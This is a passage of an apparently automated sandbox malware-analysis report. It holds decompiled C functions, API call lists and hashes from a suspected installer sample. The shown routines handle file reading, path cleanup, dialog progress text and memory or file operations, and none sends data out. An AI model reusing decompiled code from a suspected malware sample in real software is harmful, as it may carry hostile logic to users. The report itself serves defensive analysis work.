                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                            • SetBkMode.GDI32(?,?), ref: 00404573
                                                                            • GetSysColor.USER32(?), ref: 00404586
                                                                            • SetBkColor.GDI32(?,?), ref: 00404596
                                                                            • DeleteObject.GDI32(?), ref: 004045B0
                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                            				intOrPtr _t65;
                                                                            				intOrPtr _t66;
                                                                            				intOrPtr _t72;
                                                                            				void* _t76;
                                                                            				void* _t79;
                                                                            
                                                                            				_t72 = __edx;
                                                                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                            				_t65 = 2;
                                                                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                            				_t66 = E00402D84(_t65);
                                                                            				_t79 = _t66 - 1;
                                                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                            				if(_t79 < 0) {
                                                                            					L36:
                                                                            					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                            				} else {
                                                                            					__ecx = 0x3ff;
                                                                            					if(__eax > 0x3ff) {
                                                                            						 *(__ebp - 0x44) = 0x3ff;
                                                                            					}
                                                                            					if( *__edi == __bx) {
                                                                            						L34:
                                                                            						__ecx =  *(__ebp - 0xc);
                                                                            						__eax =  *(__ebp - 8);
                                                                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                            						if(_t79 == 0) {
                                                                            							 *(_t76 - 4) = 1;
                                                                            						}
                                                                            						goto L36;
                                                                            					} else {
                                                                            						 *(__ebp - 0x38) = __ebx;
                                                                            						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                                            						if( *(__ebp - 0x44) > __ebx) {
                                                                            							do {
                                                                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                                            										__eax = __ebp - 0x50;
                                                                            										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                            											goto L34;
                                                                            										} else {
                                                                            											goto L21;
                                                                            										}
                                                                            									} else {
                                                                            										goto L34;
                                                                            									}
                                                                            								} else {
                                                                            									__eax = __ebp - 0x40;
                                                                            									_push(__ebx);
                                                                            									_push(__ebp - 0x40);
                                                                            									__eax = 2;
                                                                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                            									if(__eax == 0) {
                                                                            										goto L34;
                                                                            									} else {
                                                                            										__ecx =  *(__ebp - 0x40);
                                                                            										if(__ecx == __ebx) {
                                                                            											goto L34;
                                                                            										} else {
                                                                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                            											 *(__ebp - 0x4c) = __ecx;
                                                                            											 *(__ebp - 0x50) = __eax;
                                                                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                            												L28:
                                                                            												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                            											} else {
                                                                            												__ebp - 0x50 = __ebp + 0xa;
                                                                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                            													L21:
                                                                            													__eax =  *(__ebp - 0x50);
                                                                            												} else {
                                                                            													__edi =  *(__ebp - 0x4c);
                                                                            													__edi =  ~( *(__ebp - 0x4c));
                                                                            													while(1) {
                                                                            														_t22 = __ebp - 0x40;
                                                                            														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                            														__eax = 0xfffd;
                                                                            														 *(__ebp - 0x50) = 0xfffd;
                                                                            														if( *_t22 == 0) {
                                                                            															goto L22;
                                                                            														}
                                                                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                            														__edi = __edi + 1;
                                                                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                            														__eax = __ebp + 0xa;
                                                                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                            															continue;
                                                                            														} else {
                                                                            															goto L21;
                                                                            														}
                                                                            														goto L22;
                                                                            													}
                                                                            												}
                                                                            												L22:
                                                                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                            													goto L28;
                                                                            												} else {
                                                                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                            														} else {
                                                                            															__ecx =  *(__ebp - 0xc);
                                                                            															__edx =  *(__ebp - 8);
                                                                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                            														}
                                                                            														goto L34;
                                                                            													} else {
                                                                            														__ecx =  *(__ebp - 0xc);
                                                                            														__edx =  *(__ebp - 8);
                                                                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                            														 *(__ebp - 0x38) = __eax;
                                                                            														if(__ax == __bx) {
                                                                            															goto L34;
                                                                            														} else {
                                                                            															goto L26;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L37;
                                                                            								L26:
                                                                            								__eax =  *(__ebp - 8);
                                                                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                            						}
                                                                            						goto L34;
                                                                            					}
                                                                            				}
                                                                            				L37:
                                                                            				return 0;
                                                                            			}








                                                                            0x00402817
                                                                            0x00402817
                                                                            0x0040281a
                                                                            0x0040281d
                                                                            0x00402823
                                                                            0x00402827
                                                                            0x0040282a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040282a
                                                                            0x0040280e
                                                                            0x00402807
                                                                            0x0040277f
                                                                            0x0040276b
                                                                            0x00402760
                                                                            0x00000000
                                                                            0x0040282c
                                                                            0x0040282c
                                                                            0x0040282f
                                                                            0x00402838
                                                                            0x00000000
                                                                            0x0040272f
                                                                            0x0040271a
                                                                            0x00402c33
                                                                            0x00402c39

                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                              • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                            • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                            • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E004067C4(WCHAR* _a4) {
                                                                            				short _t5;
                                                                            				short _t7;
                                                                            				WCHAR* _t19;
                                                                            				WCHAR* _t20;
                                                                            				WCHAR* _t21;
                                                                            
                                                                            				_t20 = _a4;
                                                                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                            					_t20 =  &(_t20[4]);
                                                                            				}
                                                                            				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                                            					_t20 =  &(_t20[2]);
                                                                            				}
                                                                            				_t5 =  *_t20;
                                                                            				_t21 = _t20;
                                                                            				_t19 = _t20;
                                                                            				if(_t5 != 0) {
                                                                            					do {
                                                                            						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                                            							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                            							_t19 = CharNextW(_t19);
                                                                            						}
                                                                            						_t20 = CharNextW(_t20);
                                                                            						_t5 =  *_t20;
                                                                            					} while (_t5 != 0);
                                                                            				}
                                                                            				 *_t19 =  *_t19 & 0x00000000;
                                                                            				while(1) {
                                                                            					_push(_t19);
                                                                            					_push(_t21);
                                                                            					_t19 = CharPrevW();
                                                                            					_t7 =  *_t19;
                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                            						break;
                                                                            					}
                                                                            					 *_t19 =  *_t19 & 0x00000000;
                                                                            					if(_t21 < _t19) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				return _t7;
                                                                            			}









                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                            • CharNextW.USER32(?,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                            • CharPrevW.USER32(?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2977677972
                                                                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                            • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				long _v8;
                                                                            				signed char _v12;
                                                                            				unsigned int _v16;
                                                                            				void* _v20;
                                                                            				intOrPtr _v24;
                                                                            				long _v56;
                                                                            				void* _v60;
                                                                            				long _t15;
                                                                            				unsigned int _t19;
                                                                            				signed int _t25;
                                                                            				struct HWND__* _t28;
                                                                            
                                                                            				_t28 = _a4;
                                                                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                            				if(_a8 == 0) {
                                                                            					L4:
                                                                            					_v56 = _t15;
                                                                            					_v60 = 4;
                                                                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                            					return _v24;
                                                                            				}
                                                                            				_t19 = GetMessagePos();
                                                                            				_v16 = _t19 >> 0x10;
                                                                            				_v20 = _t19;
                                                                            				ScreenToClient(_t28,  &_v20);
                                                                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                            					_t15 = _v8;
                                                                            					goto L4;
                                                                            				}
                                                                            				return _t25 | 0xffffffff;
                                                                            			}















                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                            • GetMessagePos.USER32 ref: 00404E77
                                                                            • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                            • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				short _v132;
                                                                            				int _t11;
                                                                            				int _t20;
                                                                            
                                                                            				if(_a8 == 0x110) {
                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                            					_a8 = 0x113;
                                                                            				}
                                                                            				if(_a8 == 0x113) {
                                                                            					_t20 =  *0x41ea18; // 0xe2df4
                                                                            					_t11 =  *0x42aa24; // 0xe2df8
                                                                            					if(_t20 >= _t11) {
                                                                            						_t20 = _t11;
                                                                            					}
                                                                            					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                            					SetWindowTextW(_a4,  &_v132);
                                                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                            				}
                                                                            				return 0;
                                                                            			}







                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                            • MulDiv.KERNEL32(000E2DF4,00000064,000E2DF8), ref: 00402FDC
                                                                            • wsprintfW.USER32 ref: 00402FEC
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402FE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                            • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                            • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E713C2655() {
                                                                            				intOrPtr _t24;
                                                                            				void* _t26;
                                                                            				intOrPtr _t27;
                                                                            				signed int _t39;
                                                                            				void* _t40;
                                                                            				void* _t43;
                                                                            				intOrPtr _t44;
                                                                            				void* _t45;
                                                                            
                                                                            				_t40 = E713C12BB();
                                                                            				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                                            				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                            				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                                            				do {
                                                                            					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                                            					}
                                                                            					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                                            					if(_t39 <= 7) {
                                                                            						switch( *((intOrPtr*)(_t39 * 4 +  &M713C2784))) {
                                                                            							case 0:
                                                                            								 *_t40 = 0;
                                                                            								goto L17;
                                                                            							case 1:
                                                                            								__eax =  *__eax;
                                                                            								if(__ecx > __ebx) {
                                                                            									 *(__esp + 0x10) = __ecx;
                                                                            									__ecx =  *(0x713c407c + __edx * 4);
                                                                            									__edx =  *(__esp + 0x10);
                                                                            									__ecx = __ecx * __edx;
                                                                            									asm("sbb edx, edx");
                                                                            									__edx = __edx & __ecx;
                                                                            									__eax = __eax &  *(0x713c409c + __edx * 4);
                                                                            								}
                                                                            								_push(__eax);
                                                                            								goto L15;
                                                                            							case 2:
                                                                            								__eax = E713C1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                            								goto L16;
                                                                            							case 3:
                                                                            								__ecx =  *0x713c506c;
                                                                            								__edx = __ecx - 1;
                                                                            								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                            								__eax =  *0x713c506c;
                                                                            								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                            								goto L17;
                                                                            							case 4:
                                                                            								__eax = lstrcpynW(__edi,  *__eax,  *0x713c506c);
                                                                            								goto L17;
                                                                            							case 5:
                                                                            								_push( *0x713c506c);
                                                                            								_push(__edi);
                                                                            								_push( *__eax);
                                                                            								__imp__StringFromGUID2();
                                                                            								goto L17;
                                                                            							case 6:
                                                                            								_push( *__esi);
                                                                            								L15:
                                                                            								__eax = wsprintfW(__edi, 0x713c5000);
                                                                            								L16:
                                                                            								__esp = __esp + 0xc;
                                                                            								goto L17;
                                                                            						}
                                                                            					}
                                                                            					L17:
                                                                            					_t26 =  *(_t43 + 0x14);
                                                                            					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                            						GlobalFree(_t26);
                                                                            					}
                                                                            					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                            					if(_t27 != 0) {
                                                                            						if(_t27 != 0xffffffff) {
                                                                            							if(_t27 > 0) {
                                                                            								E713C1381(_t27 - 1, _t40);
                                                                            								goto L26;
                                                                            							}
                                                                            						} else {
                                                                            							E713C1312(_t40);
                                                                            							L26:
                                                                            						}
                                                                            					}
                                                                            					_t44 = _t44 - 1;
                                                                            					_t43 = _t43 - 0x20;
                                                                            				} while (_t44 >= 0);
                                                                            				return GlobalFree(_t40);
                                                                            			}












                                                                            APIs
                                                                              • Part of subcall function 713C12BB: GlobalAlloc.KERNEL32(00000040,?,713C12DB,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12C5
                                                                            • GlobalFree.KERNEL32(?), ref: 713C2743
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C2778
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 2c0fc03926895cc48cf72fe40495d8afb31c2761f38655dc677ba4f6cd7dbe85
                                                                            • Instruction ID: bdead8be0aca97e30627cb3385e843261c6cadad4254dceff9dd448b97eba86b
                                                                            • Opcode Fuzzy Hash: 2c0fc03926895cc48cf72fe40495d8afb31c2761f38655dc677ba4f6cd7dbe85
                                                                            • Instruction Fuzzy Hash: D131CB72208116EFD7168F65C9C4D2ABBBBFB86B08324452DF542832E1CB31EC199B61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E00402950(int __ebx, void* __eflags) {
                                                                            				WCHAR* _t26;
                                                                            				void* _t29;
                                                                            				long _t37;
                                                                            				int _t49;
                                                                            				void* _t52;
                                                                            				void* _t54;
                                                                            				void* _t56;
                                                                            				void* _t59;
                                                                            				void* _t60;
                                                                            				void* _t61;
                                                                            
                                                                            				_t49 = __ebx;
                                                                            				_t52 = 0xfffffd66;
                                                                            				_t26 = E00402DA6(0xfffffff0);
                                                                            				_t55 = _t26;
                                                                            				 *(_t61 - 0x40) = _t26;
                                                                            				if(E00405E83(_t26) == 0) {
                                                                            					E00402DA6(0xffffffed);
                                                                            				}
                                                                            				E00406008(_t55);
                                                                            				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                                            				 *(_t61 + 8) = _t29;
                                                                            				if(_t29 != 0xffffffff) {
                                                                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                            					if( *(_t61 - 0x28) != _t49) {
                                                                            						_t37 =  *0x434f14;
                                                                            						 *(_t61 - 0x44) = _t37;
                                                                            						_t54 = GlobalAlloc(0x40, _t37);
                                                                            						if(_t54 != _t49) {
                                                                            							E004034E5(_t49);
                                                                            							E004034CF(_t54,  *(_t61 - 0x44));
                                                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                            							 *(_t61 - 0x10) = _t59;
                                                                            							if(_t59 != _t49) {
                                                                            								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                            								while( *_t59 != _t49) {
                                                                            									_t60 = _t59 + 8;
                                                                            									 *(_t61 - 0x3c) =  *_t59;
                                                                            									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                            									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                            								}
                                                                            								GlobalFree( *(_t61 - 0x10));
                                                                            							}
                                                                            							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                            							GlobalFree(_t54);
                                                                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                            						}
                                                                            					}
                                                                            					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                            					CloseHandle( *(_t61 + 8));
                                                                            				}
                                                                            				_t56 = 0xfffffff3;
                                                                            				if(_t52 < _t49) {
                                                                            					_t56 = 0xffffffef;
                                                                            					DeleteFileW( *(_t61 - 0x40));
                                                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                            				}
                                                                            				_push(_t56);
                                                                            				E00401423();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                                            				return 0;
                                                                            			}













                                                                            0x00402c39

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                            • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                            			E713C2480(void* __edx) {
                                                                            				void* _t37;
                                                                            				signed int _t38;
                                                                            				void* _t39;
                                                                            				void* _t41;
                                                                            				signed char* _t42;
                                                                            				signed char* _t51;
                                                                            				void* _t52;
                                                                            				void* _t54;
                                                                            
                                                                            				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                            				while(1) {
